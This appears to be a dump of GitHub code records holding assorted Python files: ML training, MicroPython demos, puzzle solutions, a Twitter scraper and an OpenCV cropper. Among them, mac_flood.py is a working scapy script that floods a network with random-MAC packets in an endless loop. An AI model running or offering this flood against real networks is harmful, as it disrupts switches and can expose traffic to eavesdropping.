input_graph_def=nnGraphDef,\n nodes_blacklist=outputNames,\n max_batch_size=args.max_batch_size,\n max_workspace_size_bytes=DEFAULT_MAX_WORKSPACE_SIZE,\n precision_mode=args.precision,\n minimum_segment_size=args.min_segment_size,\n )\n trtGraphDef = converter.convert()\n print(\"-------tf-trt model has been rebuilt.\")\n if args.nms == True:\n # Update NMS to CPU and save the model\n print(\"-------updateNMS to CPU.\")\n updateNmsCpu(trtGraphDef)\n saveGraphPath = \"nms_\" + saveGraphPath\n saveGraphDef(trtGraphDef, saveGraphPath)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NVIDIA-AI-IOT/deepstream_triton_model_deploy","sub_path":"faster_rcnn_inception_v2/export_nms_only.py","file_name":"export_nms_only.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"48"} +{"seq_id":"3563559769","text":"# Tuples are immutable, use tuples to avoid data being changed and causing errors.\n# If data in tuple needs to be changed create a list from tuple as below, then change list. This way tuple stays intact.\n\nyulia = [(\"welcome home sunshine\", \"Let me show you the master bedroom\", \"hello\"),\n (\"is blue\", \"is old\", \"hello\"),\n (\"is red\", \"has writing\", \"hello\")\n ]\n\nfor burp, thing, things in yulia:\n print(\"statement 1: {}, statement 2: {}, statement 3: {}\".format(burp[0], thing[1], things[2]))\n\n# print(yulia)\n# #print(yulia[0])\n# #print(yulia[1])\n# #print(yulia[2])\n# statement_1, statement_2, statement_3 = yulia\n# print(statement_1)\n# print(statement_2)\n# print(statement_3)\n# table = (\"coffee table\", 200, 100, 75, 34)\n# print(table[1] * table[2])\n# name, length, width, height, price = table\n# print(length * width)\n# print(str(yulia))","repo_name":"hyperblue1356/Helloworld_basics","sub_path":"tuples_intro.py","file_name":"tuples_intro.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40772963391","text":"''' demo of reading a button\n 2017-0808 PePo - added OLED display to demo\n Adafruit article:\n https://learn.adafruit.com/micropython-hardware-digital-i-slash-o/digital-inputs\n'''\nimport machine, time\nimport ssd1306\n\n__LED_PIN = const(14) #GPIO14\n__BUTTON_PIN = const(12) #GPIO12\n\n#define led to be set on / off by button\nled = machine.Pin(__LED_PIN, machine.Pin.OUT)\nled.off()\n# OPTIONAL: status of led: True=on, False=off\n# led_status = False\n\n# create i2c for OLED display\ni2c = machine.I2C(scl=machine.Pin(5), sda=machine.Pin(4), freq=100000)\nprint('i2c.scan: ', i2c.scan()) #[60]\n# OLED screen dimensions\n__WIDTH = const(128)\n__HEIGHT = const(32)\noled = ssd1306.SSD1306_I2C(__WIDTH, __HEIGHT, i2c)\n\n# define button on Pin GPIO12\nbutton = machine.Pin(__BUTTON_PIN, machine.Pin.IN, machine.Pin.PULL_UP)\n\n# helper to refresh OLED display\ndef refreshOLED(msg):\n oled.fill(0) # clear oled\n oled.text('Button demo',0,0) #header\n oled.text(msg,0,10)\n oled.show()\n\n# demo ...\ndef run():\n while True:\n first = button.value()\n time.sleep(0.01)\n second = button.value()\n if first and not second:\n print('Button pressed!')\n led.on()\n refreshOLED('LED: {0} '.format(led.value()))\n elif not first and second:\n print('Button released!')\n led.off()\n refreshOLED('LED: {0} '.format(led.value()))\n\n# run demo\ntry:\n print('Button demo, press button...')\n refreshOLED('Press button!')\n run()\nexcept:\n print('Done')\n refreshOLED('Done!')\n","repo_name":"flashypepo/myMicropython-Examples","sub_path":"button/demo_oled.py","file_name":"demo_oled.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"1347545980","text":"import re\n\ndef decompress(compressed_string):\n \"\"\" Returns the length of decompressed string. \n \"\"\"\n decompressed_len = 0\n data_count = 0\n repeat = 0\n\n i = 0\n while i < len(compressed_string):\n\n # read the data sequence?\n if data_count > 0:\n decompressed_len += data_count * repeat\n i += data_count\n data_count, repeat = 0, 0\n continue\n\n # start of marker\n regex = re.compile(r'^\\(([0-9]+)x([0-9]+)\\)')\n if regex.match(compressed_string[i:]):\n data_count, repeat = regex.search(compressed_string[i:]).groups()\n i += len(data_count) + len(repeat) + 3\n data_count, repeat = int(data_count), int(repeat)\n continue\n \n # read normal character \n decompressed_len += 1\n i += 1\n\n return decompressed_len\n\n \ndef test(): \n for compressed_string in [\"ADVENT\", \"A(1x5)BC\", \"(3x3)XYZ\",\n \"A(2x2)BCD(2x2)EFG\", \"(6x1)(1x3)A\",\n \"X(8x2)(3x3)ABCY\"]: \n decompressed_string = decompress(compressed_string)\n \n print(decompressed_string)\n\n \n\nif __name__ == \"__main__\":\n compressed_string = open(\"input9.txt\").read().strip()\n print(decompress(compressed_string))\n \n","repo_name":"PetraVidnerova/AdventOfCode2016","sub_path":"day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74982299984","text":"# If we list all the natural numbers below 10 that are multiples of 3 or 5,\n# we get 3, 5, 6 and 9. The sum of these multiples is 23.\n# Find the sum of all the multiples of 3 or 5 below 1000.\n\n# observation: multiples of 3 include 3, 6, 9, ... 999 --> 3(n), n in [1, 333]\n# observation: multiples of 5 include 5, 10, 15, ... 995 --> 5(n), n in [1, 199]\n# observation: must subtract those counted twice --> 15(n), n in [1, 66]\n\nimport time\n\ndef main():\n # method one - iterate through loops\n start = int(round(time.time() * 1000))\n sum = 0\n for i in range(333):\n sum += 3*(i+1)\n for i in range(199):\n sum += 5*(i+1)\n for i in range(66):\n sum -= 15*(i+1)\n print(sum)\n print(\"finished in \" + str(int(round(time.time() * 1000)) - start) + \"ms\")\n\n # finished in 0ms, no improvements necessary...\nmain()","repo_name":"jgross11/PE-problems","sub_path":"Problem 1.py","file_name":"Problem 1.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36505310527","text":"import torch.nn.functional as F\nimport torch.nn as nn\nfrom tqdm import tqdm\nfrom helper import HelperModel\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom torch.utils.data import Dataset, random_split\nimport math\nfrom PIL import Image\nimport cv2\nimport numpy as np\nimport torch\nimport os\nfrom tqdm import notebook\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision import transforms\nimport albumentations as A\nimport albumentations.pytorch as AP\nimport random\nfrom tqdm.notebook import tqdm\nfrom tqdm import tqdm_notebook\nimport time\nimport matplotlib.pyplot as plt\nfrom dice import dice_coefficient, iou_score\n\nclass Train(object):\n def __init__(self):\n self.train_losses = []\n self.train_acc = []\n self.train_lr = []\n\n def plot_cycle_lr(self):\n plt.plot(np.arange(1,25), self.train_lr)\n plt.xlabel('Epochs')\n plt.ylabel(\"Learning rate\")\n plt.title(\"Lr v/s Epochs\")\n plt.show()\n\n def train(self, model, device, train_loader, optimizer, criterion,l1_factor=None,scheduler=None ):\n model.train()\n pbar = tqdm(train_loader)\n correct = 0\n processed = 0\n print('LR:',optimizer.param_groups[0]['lr'])\n self.train_lr.append(optimizer.param_groups[0]['lr'])\n for batch_idx, (data, target) in enumerate(pbar):\n # get samples\n data, target = data.to(device), target.to(device)\n\n # Init\n optimizer.zero_grad()\n # In PyTorch, we need to set the gradients to zero before starting to do backpropragation because PyTorch accumulates the gradients on subsequent backward passes.\n # Because of this, when you start your training loop, ideally you should zero out the gradients so that you do the parameter update correctly.\n\n # Predict\n y_pred = model(data)\n # pdb.set_trace()\n # Calculate loss\n # loss = F.nll_loss(y_pred, target)\n # criterion = nn.CrossEntropyLoss()\n # loss = criterion(y_pred, target)\n\n loss = criterion(y_pred, target)\n\n # update l1 regularizer if requested\n if l1_factor:\n loss = HelperModel.apply_l1_regularizer(model, loss, l1_factor)\n self.train_losses.append(loss.item())\n\n # Backpropagation\n loss.backward()\n optimizer.step()\n if(scheduler):\n scheduler.step()\n\n # Update pbar-tqdm\n\n pred = y_pred.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n processed += len(data)\n\n pbar.set_description(desc=f'Train Set: Train Loss={loss.item()} Batch_id={batch_idx} Accuracy={100*correct/processed:0.2f}')\n acc = float(\"{:.2f}\".format(100 * correct / processed))\n # self.train_acc.append(100*correct/processed)\n self.train_acc.append(acc)\n \n\n\n def train_mask_depth(self,model, device, train_loader, optimizer, mask_criterion, depth_criterion, epoch, scheduler = False):\n running_mask_loss = 0\n running_depth_loss=0\n total_loss = 0\n mask_coef = 0\n depth_coef = 0\n model.train()\n pbar = tqdm(train_loader)\n total_length = len(train_loader)\n print('LR:',optimizer.param_groups[0]['lr'])\n self.train_lr.append(optimizer.param_groups[0]['lr'])\n self.train_losses = []\n self.train_acc = []\n acc_mask = 0\n acc_depth = 0\n iou_mask = 0\n iou_dense = 0\n\n for batch_idx, (data, mask_target, depth_target) in enumerate(pbar):\n # get samples\n data, mask_target, depth_target = data.to(device), mask_target.to(device), depth_target.to(device)\n\n optimizer.zero_grad()\n \n mask_target = mask_target.unsqueeze_(1)\n depth_target = depth_target.unsqueeze_(1)\n\n mask_target = torch.sigmoid(mask_target)\n depth_target = torch.sigmoid(depth_target)\n\n #Predict\n mask_pred, depth_pred = model(data)\n\n\n # Calculate loss\n \n mask_loss = mask_criterion( mask_pred,mask_target,)\n depth_loss = depth_criterion(depth_pred,depth_target)\n loss = mask_loss+ depth_loss\n running_mask_loss += mask_loss.item()\n running_depth_loss += depth_loss.item()\n\n total_loss += loss.item()\n\n # mask_coef += dice_coefficient(mask_pred,mask_target, mask= True).item()\n # depth_coef += dice_coefficient(depth_pred, depth_target, mask=False).item()\n\n iou_mask += iou_score(mask_pred.detach().cpu().numpy(), mask_target.detach().cpu().numpy())\n iou_dense += iou_score(depth_pred.detach().cpu().numpy(), depth_target.detach().cpu().numpy())\n \n # Backpropagation\n loss.backward()\n # torch.autograd.backward([mask_loss, depth_loss])\n\n optimizer.step()\n if(scheduler):\n scheduler.step()\n\n pbar.set_description(f'Loss={loss:0.4f}')\n \n\n # print(f'Mask Coeff ={mask_coef/total_length:0.4f}')\n # print(f'Depth TCoeff ={depth_coef/total_length:0.4f}')\n\n print(f'IOU Mask={iou_mask/total_length:0.4f}')\n print(f'IOU Depth={iou_dense/total_length:0.4f}')\n \n # train_losses.append((mask_loss/total_length,depth_loss/total_length))\n self.train_losses.append(total_loss/total_length)\n self.train_acc.append((mask_coef + depth_coef)/ total_length)\n # return self.train_losses, self.train_acc","repo_name":"ganeshkcs/EVA4B2","sub_path":"Utils/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37199214923","text":"def func(W, weights, values, N, DP):\r\n \"\"\"\r\n Same as - \"10_01knapsack.py\"\r\n\r\n Recursive\r\n\r\n Time O(N*W) | Space O(N*W)\r\n \"\"\"\r\n print(N, W)\r\n if W == 0:\r\n DP[W][N] = 0\r\n elif N == 0:\r\n DP[W][N] = 0\r\n elif DP[W][N] is not None:\r\n return DP[W][N]\r\n elif weights[N - 1] <= W:\r\n DP[W][N] = max(\r\n values[N - 1] + func(W - weights[N - 1], weights, values, N - 1, DP),\r\n func(W, weights, values, N - 1, DP),\r\n )\r\n else:\r\n DP[W][N] = func(W, weights, values, N - 1, DP)\r\n\r\n return DP[W][N]\r\n\r\n\r\ndef printKnapsackItems(DP, weights, values, W, N):\r\n items = []\r\n r, c = W, N\r\n while DP[r][c] != 0:\r\n if DP[r][c] == DP[r][c - 1]:\r\n c -= 1\r\n else:\r\n items.append([weights[c - 1], values[c - 1]])\r\n c -= 1\r\n r -= weights[c - 1]\r\n print(items[::-1])\r\n\r\n\r\nvalues = [6, 10, 12]\r\nweights = [1, 2, 3]\r\nW = 5\r\nN = len(weights)\r\nDP = [[None for i in range(N + 1)] for j in range(W + 1)]\r\nprint(func(W, weights, values, N, DP))\r\nprintKnapsackItems(DP, weights, values, W, N)\r\n","repo_name":"punisher21maximum/MyDSAVault","sub_path":"4 DP practice/2 InterMediate/11_1_printing01knapsack_Recursive.py","file_name":"11_1_printing01knapsack_Recursive.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71467036306","text":"# 86. Partition List\n# https://leetcode.com/problems/partition-list/\n\n# Solution by: Javi Barranco\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def partition(self, head: [ListNode], x: int) -> [ListNode]:\n if head == None or head.next == None: return head\n \n numbers = []\n node = head\n while node != None:\n numbers.append(node.val)\n node = node.next\n\n front = []\n back = []\n for num in numbers:\n if num < x:\n front.append(num)\n else:\n back.append(num)\n numbers = front + back\n\n output = ListNode(numbers[0], None)\n node = output\n for i in range(1, len(numbers)):\n node.next = ListNode(numbers[i], None)\n node = node.next\n\n return output\n \n def sameLinkedList(self, head1: [ListNode], head2: [ListNode]) -> bool:\n while head1 != None and head2 != None:\n if head1.val != head2.val:\n return False\n head1 = head1.next\n head2 = head2.next\n \n return head1 == None and head2 == None\n \n\nexercise = Solution()\ninput = ListNode(1, ListNode(4, ListNode(3, ListNode(2, ListNode(5, ListNode(2))))))\nexpected_output = ListNode(1, ListNode(2, ListNode(2, ListNode(4, ListNode(3, ListNode(5))))))\noutput = exercise.partition(input, 3)\nprint(output)\nassert exercise.sameLinkedList(output, expected_output), \"Wrong answer\"\nprint(\"Accepted\")\n","repo_name":"JaviBT/leetcode-problems","sub_path":"problems/_86_leetcode.py","file_name":"_86_leetcode.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25835463256","text":"import requests\r\n\r\n# Using a api link of a smsserver (REST API),\r\n# I have used Kavenegar that is a smsserver \r\ndef inform_me(price):\r\n API_key = 'copy your api key of this smsserver here'\r\n url = 'https://api.kavenegar.com/v1/{}/sms/send.json'.format(API_Key)\r\n payload = {'receptor':'', 'message':'Hi there, Bitcoin buy price is ${},\\nFrom Mahsa'.format(price)}\r\n response=requests.post(url, data=payload)\r\n print(response)\r\n print('Hi there, Bitcoin buy price is ${},\\nFrom '.format(price))\r\n\r\nmy_buget = 40000\r\n#buy USD price\r\n# if it is not woring in your regin use proxies(proxy support)\r\nresponse=requests.get(\"https://api.coinbase.com/v2/prices/buy?currency=USD\")\r\nprice = float(response.json()['data']['amount'])\r\nprint('At this moment, bitcoin is',price)\r\nif price <= my_buget:\r\n inform_me(price)\r\n","repo_name":"MahsaSai/API-Bitcoin","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28570676704","text":"# Dana jest lista zawierająca ciąg obustronnie domkniętych przedziałów.\n# Krańce przedziałów określa uporządkowana para liczb całkowitych. Proszę\n# napisać stosowne deklaracje oraz funkcję redukującą liczbę elementów listy.\n# Na przykład lista: [15,19] [2,5] [7,11] [8,12] [5,6] [13,17]\n# powinien zostać zredukowany do listy: [13,19] [2,6] [7,12]\n\nclass Node:\n def __init__(self, val):\n self.next = None\n self.val = (0,0)\n\ndef merge(first):\n p = first \n while p is not None:\n l = p\n q = p.next\n while q is not None:\n new = scal(p.val, q.val)\n if new:\n p.val = new\n l.next = q.next\n else:\n l = q\n q = q.next\n p = p.next\n\ndef scal(k1, k2):\n if k1[1] >= k2[0] and k2[1] >= k1[0]:\n return(min(k1[0], k2[0]), max(k1[1], k2[1]))\n return None\n\n\n","repo_name":"klark142/Introduction_to_Computer_Science","sub_path":"Zestaw 7/zad20.py","file_name":"zad20.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23954241280","text":"GAMES = [\n {\n 'name': 'Fifa',\n 'choices': [\n 'Ajax',\n 'Arsenal',\n 'Atlético',\n 'FC Barcelone',\n 'Bayern',\n 'Chelsea',\n 'Dortmund',\n 'Iter Milan',\n 'Juventus',\n 'Liverpool',\n 'Man. City',\n 'Man. United',\n 'Napoli',\n 'PSG',\n 'Real Madrid',\n 'Tottenham'\n ],\n 'max': 2\n },\n {\n 'name': 'NHL',\n 'choices': [\n 'Hurricanes',\n 'Blue Jackets',\n 'Devils',\n 'Islanders',\n 'Rangers',\n 'Flyers',\n 'Penguins',\n 'Capitals',\n 'Bruins',\n 'Red Wings',\n 'Panthers',\n 'Canadiens',\n 'Senators',\n 'Lightning',\n 'Maple Leafs',\n 'Blackhawks',\n 'Avalanche',\n 'Wild',\n 'Stars',\n 'Predators',\n 'Blues',\n 'Jets',\n 'Ducks',\n 'Coyotes',\n 'Flames',\n 'Oilers',\n 'Kings',\n 'Canucks',\n 'Golden Knights'\n ],\n 'max': 2\n },\n {\n 'name': 'Madden',\n 'choices': [\n 'Bills',\n 'Dolphins',\n 'Patriots',\n 'Jets',\n 'Ravens',\n 'Bengals',\n 'Browns',\n 'Steelers',\n 'Texans',\n 'Colts',\n 'Jaguars',\n 'Titans',\n 'Broncos',\n 'Chiefs',\n 'Chargers',\n 'Raiders',\n 'Cowboys',\n 'Giants',\n 'Eagles',\n 'Redskins',\n 'Bears',\n 'Lions',\n 'Packers',\n 'Vikings',\n 'Falcons',\n 'Panthers',\n 'Saints',\n 'Buccaneers',\n 'Cardinals',\n 'Rams',\n '49ers',\n 'Seahawks'\n ],\n 'max': 2\n },\n {\n 'name': 'Super Smash Bros',\n 'choices': [\n 'Mario',\n 'Donkey Kong',\n 'Link',\n 'Samus Aran',\n 'Dark Samus',\n 'Yoshi',\n 'Kirby',\n 'Fox',\n 'Pikachu',\n 'Luigi',\n 'Ness',\n 'Captain Falcon',\n 'Jigglypuff',\n 'Peach',\n 'Daisy',\n 'Bowser',\n 'Ice Climbers',\n 'Sheik',\n 'Zelda',\n 'Dr. Mario',\n 'Pichu',\n 'Falco',\n 'Marth',\n 'Lucina',\n 'Young Link',\n 'Ganondorf',\n 'Mewtwo',\n 'Roy',\n 'Chrom',\n 'Mr. Game & Watch',\n 'Meta Knight',\n 'Pit',\n 'Dark Pit',\n 'Zero Suit Samus',\n 'Wario',\n 'Snake',\n 'Ike',\n 'Pokemon Trainer',\n 'Diddy Kong',\n 'Lucas',\n 'Sonic',\n 'King Dedede',\n 'Olimar',\n 'Lucario',\n 'R.O.B.',\n 'Toon Link',\n 'Wolf',\n 'Villager',\n 'Mega Man',\n 'Wii Fit Trainer',\n 'Rosalina & Luma',\n 'Little Mac',\n 'Greninja',\n 'Mii Fighter (Brawler)',\n 'Mii Fighter (Swordfighter)',\n 'Mii Fighter (Gunner)',\n 'Palutena',\n 'Pac-Man',\n 'Robin',\n 'Shulk',\n 'Bowser Jr',\n 'Duck Hunt',\n 'Ryu',\n 'Ken',\n 'Cloud',\n 'Corrin',\n 'Bayonetta',\n 'Inkling',\n 'Ridley',\n 'Simon',\n 'Richter',\n 'King K. Rool',\n 'Isabelle',\n 'Incineroar'\n ],\n 'max': 4\n }\n]","repo_name":"papa-ours/server3x","sub_path":"games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36121506708","text":"import sys\nimport os\nimport twint\nimport getopt\nimport psycopg2\nimport pandas as pd\nimport psycopg2.extras as extras\nfrom datetime import datetime\nfrom dotenv import load_dotenv\n\ndef conn_db():\n\n load_dotenv()\n \n DB_NAME = os.getenv('dbname')\n DB_USER = os.getenv('user')\n DB_HOST = os.getenv('host')\n DB_PASSWD = os.getenv('password')\n \n #print(\"dbname=\"+ DB_NAME + \" user=\" + DB_USER + \" host=\" + DB_HOST + \" password=\" + DB_PASSWD)\n \n conn = psycopg2.connect(\"dbname=\"+ DB_NAME + \" user=\" + DB_USER + \" host=\" + DB_HOST + \" password=\" + DB_PASSWD)\n \n return conn\n\ndef create_db(conn):\n \n cur = conn.cursor()\n\n cur.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS tweets (\n id VARCHAR(100),\n scrapping_date VARCHAR(15),\n scrapping_term VARCHAR(50),\n conversation_id VARCHAR(100),\n date_time VARCHAR(20),\n timezone INTEGER,\n user_id VARCHAR(100),\n username VARCHAR(15),\n name VARCHAR(50),\n tweet VARCHAR(500),\n language VARCHAR(10),\n replies_count INTEGER,\n retweets_count INTEGER,\n likes_count INTEGER,\n hashtags VARCHAR(400),\n link VARCHAR(100),\n quote_url VARCHAR(100),\n video INTEGER,\n reply_to VARCHAR(10000),\n thumbnail VARCHAR(150)\n );\n \"\"\"\n )\n\n conn.commit()\n\n cur.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS retweets (\n id VARCHAR(100),\n scrapping_date VARCHAR(15),\n scrapping_term VARCHAR(50),\n conversation_id VARCHAR(100),\n date_time VARCHAR(20),\n timezone INTEGER,\n user_id VARCHAR(100),\n username VARCHAR(15),\n name VARCHAR(50),\n tweet VARCHAR(500),\n language VARCHAR(10),\n replies_count INTEGER,\n retweets_count INTEGER,\n likes_count INTEGER,\n hashtags VARCHAR(400),\n link VARCHAR(100),\n video INTEGER,\n user_rt_id VARCHAR(100),\n user_rt VARCHAR(500),\n retweet_date VARCHAR(25),\n retweet_id VARCHAR(100),\n thumbnail VARCHAR(150)\n );\n \"\"\"\n )\n\n conn.commit()\n\n cur.close()\n #conn.close()\n\ndef insert_db_tweets(conn, dataframe, date, term):\n \"\"\"\n Using psycopg2.extras.execute_values() to insert the dataframe\n \"\"\"\n\n # Create a list of tupples from the dataframe values\n #tuples = [tuple(x) for x in dataframe.to_numpy()]\n \n \n tuples = []\n for x in dataframe.to_numpy():\n tuples.append((str(x[0]), str(date), str(term), str(x[1]), str(x[3]), \n str(x[4]), str(x[11]), str(x[12]), str(x[13]),\n str(x[6]), str(x[7]), str(x[23]), str(x[24]), str(x[22]), \n str(x[8]), str(x[16]), str(x[25]), str(x[19]), str(x[33]), str(x[20])))\n \n # SQL quert to execute\n query = \"\"\"\n INSERT into tweets(id, scrapping_date, scrapping_term, conversation_id, \n date_time, timezone, user_id, username, name, tweet, language, replies_count,\n retweets_count, likes_count, hashtags, link, quote_url, video, reply_to, thumbnail)\n VALUES %s;\n \"\"\"\n\n cursor = conn.cursor()\n try:\n extras.execute_values(cursor, query, tuples)\n conn.commit()\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error: %s\" % error)\n conn.rollback()\n cursor.close()\n return 1\n print(\"insert_db_tweets() done\")\n cursor.close()\n\ndef insert_db_retweets(conn, dataframe, date, term):\n \"\"\"\n Using psycopg2.extras.execute_values() to insert the dataframe\n \"\"\"\n\n # Create a list of tupples from the dataframe values\n #tuples = [tuple(x) for x in dataframe.to_numpy()]\n\n tuples = []\n for x in dataframe.to_numpy():\n tuples.append((str(x[0]), str(date), str(term), str(x[1]), str(x[3]), \n str(x[4]), str(x[11]), str(x[12]), str(x[13]),\n str(x[6]), str(x[7]), str(x[23]), str(x[24]), str(x[22]), \n str(x[8]), str(x[16]), str(x[19]), str(x[30]),\n str(x[31]), str(x[34]), str(x[32]), str(x[20])))\n \n # SQL quert to execute\n query = \"\"\"\n INSERT into retweets(id, scrapping_date, scrapping_term, conversation_id, date_time, \n timezone, user_id, username, name, tweet, language, replies_count,\n retweets_count, likes_count, hashtags, link, video, user_rt_id,\n user_rt, retweet_date, retweet_id, thumbnail)\n VALUES %s;\n \"\"\"\n\n cursor = conn.cursor()\n try:\n extras.execute_values(cursor, query, tuples)\n conn.commit()\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error: %s\" % error)\n conn.rollback()\n cursor.close()\n return 1\n print(\"insert_db_retweets() done\")\n cursor.close()\n\ndef get_tweets(hashtag, date_since, date_until):\n \n t = twint.Config() # Inicializa\n t.Search = hashtag\n t.Since = date_since\n t.Until = date_until\n t.Retweets = True\n t.Pandas = True # Permitir integracao com pandas\n t.Hide_output = True # Nao imprime no terminal\n twint.run.Search(t) # Executa a busca\n\n tweets_df = twint.storage.panda.Tweets_df\n\n return tweets_df\n\n\ndef get_retweets(hashtag, date_since, date_until):\n\n rt = twint.Config() #Inicializa\n rt.Search = hashtag\n rt.Since = date_since\n rt.Until = date_until\n rt.Native_retweets = True\n rt.Pandas = True #Permitir integracao com pandas\n rt.Hide_output = True #Nao imprime no terminal\n twint.run.Search(rt) #Executa a busca\n\n rt_df = twint.storage.panda.Tweets_df\n\n return rt_df\n\ndef main(argv):\n\n hashtag = ''\n date_since = ''\n date_until = ''\n \n # Check parameters\n try:\n opts, args = getopt.getopt(argv, 'ht:s:u:',['term=','date_since=','date_until='])\n if len(opts) < 3: \n raise getopt.GetoptError('')\n except getopt.GetoptError:\n print('Error or missing argument. \\nusage: getData.py -t -s -u ')\n print('Example: python getData.py -t #brasil -s 2022-01-05 -u 2022-01-10')\n sys.exit(2)\n \n for opt, arg in opts:\n if opt == '-h':\n print('Usage: getData.py -t -s -u ')\n print('Example: python getData.py -t brasil -s 2022-01-05 -u 2022-01-10')\n sys.exit()\n if opt in (\"-t\", \"--term\"):\n hashtag = [arg]\n if opt in (\"-s\", \"--date_since\"):\n date_since = arg\n if opt in (\"-u\", \"--date_until\"):\n date_until = arg\n \n # Creating database\n conn = conn_db()\n \n create_db(conn)\n \n # Each search made will receive a date\n date = datetime.today().strftime('%d-%m-%Y')\n \n # Collect data\n # TODO: ajustar para aceitar lista no parâmetro '-t' na linha de comando.\n # Por enquanto executando para um termo só\n for term in hashtag:\n print('----------------------------')\n print('Collecting ' + term + \" since \" + date_since) \n \n print('Tweets')\n # Scrapping tweets\n tweets = get_tweets(term, date_since, date_until)\n # Inserting in the database\n insert_db_tweets(conn, tweets, date, term)\n\n print('Retweets')\n # Scrapping retweets\n rt = get_retweets(term, date_since, date_until)\n # Inserting in the database\n insert_db_retweets(conn, rt, date, term)\n\n print('Collection completed: ' + term)\n \n conn.close()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"itsriodejaneiro/pegabot-report","sub_path":"collect/continua/collectingScript.py","file_name":"collectingScript.py","file_ext":"py","file_size_in_byte":7844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41122684769","text":"import cv2\nimport os\nimport numpy as np\n\ntop_left_corner = []\nbottom_right_corner = []\n\nimg = cv2.imread('./content/sea.jpeg', 1)\nimg = cv2.resize(img,(0,0), fx=0.4,fy=0.4)\nimage = img.copy()\ncropped_image = image.copy()\n\ndef cropImage(action, x,y, flags, *userdata):\n global top_left_corner, bottom_right_corner\n global cropped_image\n\n if action == cv2.EVENT_LBUTTONDOWN:\n top_left_corner.append((x,y))\n elif action == cv2.EVENT_LBUTTONUP:\n bottom_right_corner.append((x,y))\n \n cropped_image = img[top_left_corner[-1][1] : bottom_right_corner[-1][1], top_left_corner[-1][0] : bottom_right_corner[-1][0]]\n cv2.imshow(\"Penguin\", img)\n cv2.imshow(\"Cropped\", cropped_image)\n\ncv2.namedWindow(\"Penguin\")\ncv2.setMouseCallback(\"Penguin\", cropImage)\n\nk = 0\ncount = 0\npath = \"./content/cropped\"\nwhile k!= 113: # 113 <-> q (Press q to exit)\n cv2.imshow(\"Penguin\", img)\n k = cv2.waitKey(0)\n if k == 115: # Press s to save\n count +=1\n file_name = \"penguin_cropped_\" + str(count) + \".png\"\n cv2.imwrite(os.path.join(path, file_name), cropped_image)\n\ncv2.destroyAllWindows()","repo_name":"chungngoc/Getting_started_with_OpenCV","sub_path":"crop_gui_opencv.py","file_name":"crop_gui_opencv.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72531037586","text":"#!/usr/bin/python\n\nimport sys\nimport time\nfrom scapy.all import *\n\niface = \"eth1\"\nif len(sys.argv)>=2:\n iface = argv[1]\n\nwhile(1):\n packet = Ether(src=RandMAC(\"*:*:*:*:*:*\"),\n dst=RandMAC(\"*:*:*:*:*:*\"))/\\\n IP(src=RandIP(\"*.*.*.*\"),\n dst=RandIP(\"*.*.*.*\"))/\\\n ICMP()\n time.sleep(0.5)\n sendp(packet,iface=iface,loop=0)","repo_name":"hunterzju/python","sub_path":"python/mac_flood.py","file_name":"mac_flood.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16308411381","text":"print(\"Enter number of inputs:\")\nn = int(input())\nphonebook = dict()\nfor i in range(n):\n print(\"Enter data:\")\n line = input()\n line = line.split()\n phonebook[line[0]] = phonebook.get(line[0], line[1])\n\nwhile 1:\n try:\n print(\"Enter name to fetch data:\")\n q = input()\n if q in phonebook:\n print(str(q) + \"=\" + str(phonebook[q]))\n else:\n print(\"Not found\")\n except:\n break","repo_name":"TanayKapoor/Python-Practice","sub_path":"Practice/nameequals.py","file_name":"nameequals.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36868969007","text":"\"\"\"\n矩阵计算\n\"\"\"\nclass Solution:\n def solute(self, n: int):\n C_arr = [0, 0, 1, 1, 1, 0, 1]\n count = 0\n for i in range(1, n + 1):\n for j in range(1, n + 1):\n if C_arr[(i % 7 * j % 7) ** 3 % 7] == 1: # 这样求余防止溢出,\n count += 1\n return 